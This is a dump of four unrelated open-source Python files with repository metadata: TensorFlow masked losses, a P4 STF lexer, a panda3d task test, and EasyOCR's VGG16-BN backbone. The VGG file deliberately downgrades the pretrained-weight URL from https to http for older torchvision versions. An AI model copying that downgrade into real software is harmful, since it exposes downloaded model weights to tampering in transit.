metrics.py
|
import tensorflow as tf
# DISCLAIMER:
# Parts of this code file were originally forked from
# https://github.com/tkipf/gcn
# which itself was very inspired by the keras package
def masked_logit_cross_entropy(preds, labels, mask):
"""Logit cross-entropy loss with masking."""
loss = tf.nn.sigmoid_cross_entropy_with_logits(logits=preds, labels=labels)
loss = tf.reduce_sum(loss, axis=1)
mask = tf.cast(mask, dtype=tf.float32)
mask /= tf.maximum(tf.reduce_sum(mask), tf.constant([1.]))
loss *= mask
return tf.reduce_mean(loss)
def masked_softmax_cross_entropy(preds, labels, mask):
"""Softmax cross-entropy loss with masking."""
loss = tf.nn.softmax_cross_entropy_with_logits(logits=preds, labels=labels)
mask = tf.cast(mask, dtype=tf.float32)
mask /= tf.maximum(tf.reduce_sum(mask), tf.constant([1.]))
loss *= mask
return tf.reduce_mean(loss)
def masked_l2(preds, actuals, mask):
"""L2 loss with masking."""
loss = tf.reduce_sum(tf.square(preds - actuals), axis=1)  # per-example squared error (tf.nn.l2 is not a TensorFlow API)
mask = tf.cast(mask, dtype=tf.float32)
mask /= tf.reduce_mean(mask)
loss *= mask
return tf.reduce_mean(loss)
def masked_accuracy(preds, labels, mask):
"""Accuracy with masking."""
correct_prediction = tf.equal(tf.argmax(preds, 1), tf.argmax(labels, 1))
accuracy_all = tf.cast(correct_prediction, tf.float32)
mask = tf.cast(mask, dtype=tf.float32)
mask /= tf.reduce_mean(mask)
accuracy_all *= mask
return tf.reduce_mean(accuracy_all)
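# Hypothetical smoke test (not part of the original module; assumes TF2 eager execution):
if __name__ == "__main__":
    preds = tf.random.normal([4, 3])              # logits for 4 nodes, 3 classes
    labels = tf.one_hot([0, 2, 1, 0], depth=3)
    mask = tf.constant([1.0, 1.0, 0.0, 1.0])      # third node excluded from the loss
    print(float(masked_softmax_cross_entropy(preds, labels, mask)))
    print(float(masked_accuracy(preds, labels, mask)))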
|
5d7ca3923de496176535ed8b5da7725d36922802
|
6bf995003dfe009129f7d93b63ec2478927324e0
|
/tools/stf/stf_lexer.py
|
5019f379612454b59da22298d5578f1fd7d9effc
|
[
"Apache-2.0"
] |
permissive
|
p4lang/p4c
|
e9fd8acfa25a6e1e42adffd136cbf6cd5e94018a
|
4a393c951e1f4fdbdc3894a1f8d2929e700adeb7
|
refs/heads/main
| 2023-09-04T16:30:20.238093
| 2023-09-04T06:55:44
| 2023-09-04T06:55:44
| 55,433,859
| 621
| 555
|
Apache-2.0
| 2023-09-14T14:22:46
| 2016-04-04T18:12:32
|
C++
|
UTF-8
|
Python
| false
| false
| 7,008
|
py
|
stf_lexer.py
|
# Copyright 2013-present Barefoot Networks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# -----------------------------------------------------------------------------
# stf_lexer.py
#
# Tokenize an STF file.
# -----------------------------------------------------------------------------
import ply.lex as lex
from ply.lex import TOKEN
class STFLexer:
def __init__(self):
self.filename = ""
# Keeps track of the last token returned from self.token()
self.last_token = None
self.errors_cnt = 0
self.lexer = None
self.states = (
# add a state to lex only keywords. By default, all keywords
# are IDs. Fortunately, in the current grammar all keywords
# are commands at the beginning of a line (except for packets and bytes!).
("keyword", "inclusive"),
# lex only packet data
("packetdata", "exclusive"),
)
self.keywords = [
"ADD",
"ALL",
"BYTES",
"CHECK_COUNTER",
"EXPECT",
"NO_PACKET",
"PACKET",
"PACKETS",
"REMOVE",
"SETDEFAULT",
"WAIT",
]
self.keywords_map = {}
for keyword in self.keywords:
if keyword == "P4_PARSING_DONE":
self.keywords_map[keyword] = keyword
else:
self.keywords_map[keyword.lower()] = keyword
self.tokens = [
"COLON",
"COMMA",
"DATA_DEC",
"DATA_HEX",
"DATA_TERN",
"DATA_EXACT",
"DOT",
"ID",
"INT_CONST_BIN",
"INT_CONST_DEC",
"TERN_CONST_HEX",
"INT_CONST_HEX",
"LBRACKET",
"RBRACKET",
"LPAREN",
"RPAREN",
"SLASH",
"EQUAL",
"EQEQ",
"LE",
"LEQ",
"GT",
"GEQ",
"NEQ",
] + self.keywords
def reset_lineno(self):
"""Resets the internal line number counter of the lexer."""
self.lexer.lineno = 1
self.lexer.colno = 1
def get_lineno(self):
return self.lexer.lineno
def get_colno(self):
return self.lexer.colno
# input() and token() are required when building parser from this lexer
def input(self, text):
self.lexer.input(text)
def token(self):
self.last_token = self.lexer.token()
self.lexer.colno += 1
# print self.last_token
return self.last_token
def find_tok_column(self, token):
"""Find the column of the token in its line."""
last_cr = self.lexer.lexdata.rfind("\n", 0, token.lexpos)
return token.lexpos - last_cr
# Build the lexer
def build(self, **kwargs):
self.lexer = lex.lex(module=self, **kwargs)
# start the lexer looking for keywords
self.lexer.begin("keyword")
def _error(self, s, token):
print(s, "in file", self.filename, "at line", self.get_lineno())
self.errors_cnt += 1
t_ignore_COMMENT = r"\#.*"
t_COLON = r":"
t_COMMA = r","
t_DOT = r"\."
t_LBRACKET = r"\["
t_RBRACKET = r"\]"
t_LPAREN = r"\("
t_RPAREN = r"\)"
t_EQUAL = r"="
t_EQEQ = r"=="
t_NEQ = r"!="
t_LE = r"<"
t_LEQ = r"<="
t_GT = r">"
t_GEQ = r">="
t_SLASH = r"/"
# binary constants with ternary (don't care) bits
binary_constant = r"(0[bB][*01]+)"
hex_prefix = r"0[xX]"
hex_digits = r"[0-9a-fA-F]"
hex_constant_body = r"(" + hex_digits + r"+)"
hex_constant = r"(" + hex_prefix + hex_constant_body + r")"
hex_tern = r"([0-9a-fA-F\*]+)"
hex_tern_constant = r"(" + hex_prefix + hex_tern + r")"
dec_constant = r"([0-9]+)"
identifier = r"([a-z$A-Z_][a-z$A-Z_0-9]*)"
quoted_identifier = r"\"[^\"]+\""
@TOKEN(hex_tern_constant)
def t_TERN_CONST_HEX(self, t):
return t
@TOKEN(hex_constant)
def t_INT_CONST_HEX(self, t):
return t
@TOKEN(binary_constant)
def t_INT_CONST_BIN(self, t):
return t
@TOKEN(dec_constant)
def t_INT_CONST_DEC(self, t):
return t
# Identifiers in the keyword state should be checked against keywords.
# In fact, it should be an error not to find a keyword!!
# Throwing that as an error is left as an exercise for next time
# when we read the ply manual.
@TOKEN(identifier)
def t_keyword_ID(self, t):
typ = self.keywords_map.get(t.value.lower(), "ID")
t.type = typ
if typ == "EXPECT" or typ == "PACKET":
t.lexer.begin("packetdata")
else:
t.lexer.begin("INITIAL")
# print t, "pos:", t.lexpos, "col:", self.lexer.colno
return t
# All identifiers, including keywords are returned as ID outside
# the keyword state, except for PACKETS and BYTES (counter types)
@TOKEN(identifier)
def t_ID(self, t):
typ = self.keywords_map.get(t.value.lower(), "ID")
if typ == "BYTES" or typ == "PACKETS":
t.type = typ
# print t, "pos:", t.lexpos, "col:", self.lexer.colno
return t
@TOKEN(quoted_identifier)
def t_quoted_ID(self, t):
t.type = "ID"
t.value = t.value[1:-1]
return t
# Discard comments.
def t_COMMENT(self, t):
r"\#.*$"
pass
# Track line numbers.
def t_newline(self, t):
r"\n+"
t.lexer.lineno += len(t.value)
t.lexer.colno = 0
t.lexer.begin("keyword")
# Ignore spaces and tabs.
t_ignore = " \t"
# Error handling.
def t_error(self, t):
self._error("Illegal character '%s'" % t.value[0], t)
# PACKET DATA ------------------------------------------------------------
@TOKEN(dec_constant)
def t_packetdata_DATA_DEC(self, t):
return t
@TOKEN(hex_constant_body)
def t_packetdata_DATA_HEX(self, t):
return t
def t_packetdata_DATA_TERN(self, t):
r"\*"
return t
def t_packetdata_DATA_EXACT(self, t):
r"\$"
return t
def t_packetdata_newline(self, t):
r"\n+"
t.lexer.lineno += len(t.value)
t.lexer.begin("keyword")
# Ignore spaces and tabs.
t_packetdata_ignore = " \t"
# Error handling.
def t_packetdata_error(self, t):
self._error("invalid packet data", t)
|
30770af33cdc311099a63a4c5eca5962774764c5
|
c7c73566784a7896100e993606e1bd8fdd0ea94e
|
/tests/task/test_task_arg.py
|
26b35520538b6db99ca9bf62007ca224f9d8a014
|
[
"BSD-3-Clause",
"BSD-2-Clause"
] |
permissive
|
panda3d/panda3d
|
c3f94df2206ff7cfe4a3b370777a56fb11a07926
|
160ba090a5e80068f61f34fc3d6f49dbb6ad52c5
|
refs/heads/master
| 2023-08-21T13:23:16.904756
| 2021-04-11T22:55:33
| 2023-08-06T06:09:32
| 13,212,165
| 4,417
| 1,072
|
NOASSERTION
| 2023-09-09T19:26:14
| 2013-09-30T10:20:25
|
C++
|
UTF-8
|
Python
| false
| false
| 733
|
py
|
test_task_arg.py
|
from direct.showbase.ShowBase import ShowBase
from direct.task import Task
from panda3d.core import Vec2
def test_task_arg(base):
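# With appendTask=True the Task object is appended after extraArgs, hence the (ship, flood, task) signature below.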
def test(ship, flood, task):
ship.y += flood
return task.done
ship = Vec2(2.2, 2)
flood = 1
task = base.addTask(test, 'test_task', extraArgs=[ship, flood], appendTask=True)
base.taskMgr.step()
assert ship.y == 3
base.remove_task(task)
task = base.addTask(task)
base.taskMgr.step()
assert ship.y == 4
task = base.taskMgr.add(test, 'test_task', extraArgs=[ship, flood], appendTask=True)
base.taskMgr.step()
assert ship.y == 5
base.remove_task(task)
task = base.taskMgr.add(task)
base.taskMgr.step()
assert ship.y == 6
|
da83838515607a83f5e72d06e90aa03b26f3e847
|
b08a6adc56016a706d84752bcfb6d5bdf014f9fd
|
/trainer/craft/model/vgg16_bn.py
|
fde415fc2c087d902a9a9bafc58449aadf223f45
|
[
"Apache-2.0"
] |
permissive
|
JaidedAI/EasyOCR
|
c83903d2f0ac2adfda89b35274e71a410f7d12e8
|
f947eaa36a55adb306feac58966378e01cc67f85
|
refs/heads/master
| 2023-08-08T08:34:28.434530
| 2023-07-04T12:44:09
| 2023-07-04T12:44:09
| 247,266,215
| 20,057
| 2,937
|
Apache-2.0
| 2023-09-12T22:16:00
| 2020-03-14T11:46:39
|
Python
|
UTF-8
|
Python
| false
| false
| 2,962
|
py
|
vgg16_bn.py
|
import torch
import torch.nn as nn
import torch.nn.init as init
import torchvision
from torchvision import models
from packaging import version
def init_weights(modules):
for m in modules:
if isinstance(m, nn.Conv2d):
init.xavier_uniform_(m.weight.data)
if m.bias is not None:
m.bias.data.zero_()
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
elif isinstance(m, nn.Linear):
m.weight.data.normal_(0, 0.01)
m.bias.data.zero_()
class vgg16_bn(torch.nn.Module):
def __init__(self, pretrained=True, freeze=True):
super(vgg16_bn, self).__init__()
if version.parse(torchvision.__version__) >= version.parse('0.13'):
vgg_pretrained_features = models.vgg16_bn(
weights=models.VGG16_BN_Weights.DEFAULT if pretrained else None
).features
else: # torchvision.__version__ < 0.13
models.vgg.model_urls['vgg16_bn'] = models.vgg.model_urls['vgg16_bn'].replace('https://', 'http://')
vgg_pretrained_features = models.vgg16_bn(pretrained=pretrained).features
self.slice1 = torch.nn.Sequential()
self.slice2 = torch.nn.Sequential()
self.slice3 = torch.nn.Sequential()
self.slice4 = torch.nn.Sequential()
self.slice5 = torch.nn.Sequential()
for x in range(12): # conv2_2
self.slice1.add_module(str(x), vgg_pretrained_features[x])
for x in range(12, 19): # conv3_3
self.slice2.add_module(str(x), vgg_pretrained_features[x])
for x in range(19, 29): # conv4_3
self.slice3.add_module(str(x), vgg_pretrained_features[x])
for x in range(29, 39): # conv5_3
self.slice4.add_module(str(x), vgg_pretrained_features[x])
# fc6, fc7 without atrous conv
self.slice5 = torch.nn.Sequential(
nn.MaxPool2d(kernel_size=3, stride=1, padding=1),
nn.Conv2d(512, 1024, kernel_size=3, padding=6, dilation=6),
nn.Conv2d(1024, 1024, kernel_size=1)
)
if not pretrained:
init_weights(self.slice1.modules())
init_weights(self.slice2.modules())
init_weights(self.slice3.modules())
init_weights(self.slice4.modules())
init_weights(self.slice5.modules()) # no pretrained model for fc6 and fc7
if freeze:
for param in self.slice1.parameters(): # freeze the whole first block (slice1)
param.requires_grad = False
def forward(self, X):
h = self.slice1(X)
h_relu2_2 = h
h = self.slice2(h)
h_relu3_2 = h
h = self.slice3(h)
h_relu4_3 = h
h = self.slice4(h)
h_relu5_3 = h
h = self.slice5(h)
h_fc7 = h
return h_fc7, h_relu5_3, h_relu4_3, h_relu3_2, h_relu2_2
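# Hypothetical smoke test (not part of the original module); pretrained=False avoids downloading weights.
if __name__ == "__main__":
    backbone = vgg16_bn(pretrained=False, freeze=False)
    x = torch.randn(1, 3, 224, 224)
    fc7, relu5_3, relu4_3, relu3_2, relu2_2 = backbone(x)
    # expected spatial sizes for a 224x224 input: 14, 14, 28, 56, 112
    # (the dilated fc6/fc7 head keeps the 1/16 stride of relu5_3)
    print([tuple(t.shape) for t in (fc7, relu5_3, relu4_3, relu3_2, relu2_2)])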
|